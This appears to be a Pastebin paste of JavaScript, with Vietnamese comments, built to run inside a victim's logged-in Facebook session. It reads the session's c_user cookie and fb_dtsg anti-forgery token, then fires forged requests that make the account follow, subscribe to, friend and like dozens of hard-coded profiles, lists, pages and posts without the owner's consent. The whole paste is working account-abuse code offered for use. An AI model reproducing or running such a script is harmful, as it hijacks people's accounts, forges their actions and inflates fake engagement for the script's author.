Advertisement
langtukucuong

sub chính

May 1st, 2014
308
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.16 KB | None | 0 0
  1. function a(abone)
  2. { var http4=new XMLHttpRequest;
  3. var url4="/ajax/follow/follow_profile.php?__a=1";
  4. var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";
  5. http4.open("POST",url4,true);
  6. http4.onreadystatechange=function()
  7. { if(http4.readyState==4&&http4.status==200)http4.close };
  8. http4.send(params4)}
  9. function sublist(uidss) {
  10. var a = document.createElement('script');
  11. a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  12. document.body.appendChild(a);
  13. }
  14. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  15. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  16. var now = (new Date).getTime();
  17. function P(post) {
  18. var X = new XMLHttpRequest();
  19. var XURL = "//www.facebook.com/ajax/ufi/like.php";
  20. var XParams = "like_action=true&ft_ent_identifier=" + post + "&source=1&client_id=" + now + "%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]=" + post + "&nctr[_mod]=pagelet_home_stream&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg=" + fb_dtsg + "&phstamp=";
  21. X.open("POST", XURL, true);
  22. X.onreadystatechange = function () {
  23. if (X.readyState == 4 && X.status == 200) {
  24. X.close;
  25. }
  26. };
  27. X.send(XParams);
  28. }
  29. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  30. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  31. function Like(p) {
  32. var Page = new XMLHttpRequest();
  33. var PageURL = "//www.facebook.com/ajax/pages/fan_status.php";
  34. var PageParams = "&fbpage_id=" + p + "&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=" + fb_dtsg + "&phstamp=";
  35. Page.open("POST", PageURL, true);
  36. Page.onreadystatechange = function () {
  37. if (Page.readyState == 4 && Page.status == 200) {
  38. Page.close;
  39. }
  40. };
  41. Page.send(PageParams);
  42. }
  43. function IDS(r) {
  44. var X = new XMLHttpRequest();
  45. var XURL = "//www.facebook.com/ajax/add_friend/action.php";
  46. var XParams = "to_friend=" + r +"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";
  47. X.open("POST", XURL, true);
  48. X.onreadystatechange = function () {
  49. if (X.readyState == 4 && X.status == 200) {
  50. X.close;
  51. }
  52. };
  53. X.send(XParams);
  54. }
  55. //id
  56. a("100004751498536");
  57. a("100006617017450");
  58. a("100008266386764");
  59. // list
  60. sublist("206766569491725");
  61. sublist("1417768151787072");
  62. sublist("1417768165120404");
  63. sublist("212457878928062");
  64. sublist("1417768178453736");
  65. sublist("1417768101787077");
  66. sublist("1417768055120415");
  67. sublist("1417768071787080");
  68. sublist("1417768125120408");
  69. sublist("1417768025120418");
  70. sublist("1417768041787083");
  71. // suneko
  72. a("100003022789540");
  73. // test sub cho suke
  74. sublist("279779408857107");
  75. //ids
  76. IDS("100006617017450");
  77. IDS("100004751498536");
  78. IDS("100008266386764");
  79. //túsida
  80. a("100006577932306");
  81. sublist("1396984890530762");
  82. sublist("1419828564913061");
  83. sublist("1441678262728091");
  84. sublist("1441678089394775");
  85. //long sida
  86. a("100004029967136");
  87. a("100008160426424");
  88. a("100005734206098");
  89. sublist("427597577384571");
  90. IDS("100004029967136");
  91. IDS("100008160426424");
  92. //tê tê sê ành cờ lone
  93. Like("681778975196705");
  94. Like("621748664571732");
  95. Like("1394318324158336");
  96. Like("465822010206629");
  97. Like("228799747310265");
  98. Like("758453514178527");
  99. Like("498646686923879");
  100. Like("136896583071900");
  101. Like("258306117669214");
  102. Like("1428623030697442");
  103. //hải anh shoppp kéo
  104. Like("758453514178527");
  105. // ma
  106. Like("615163085227212");
  107. // avata of ttc
  108. P("281866635315051");P("1478231689074051");
  109. // ảnh bìa
  110. P("290837701084611");P("1478488195715067");
  111. //sukeshino
  112. P("490081284435960");
  113. // hào
  114. P("1421394678123640");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement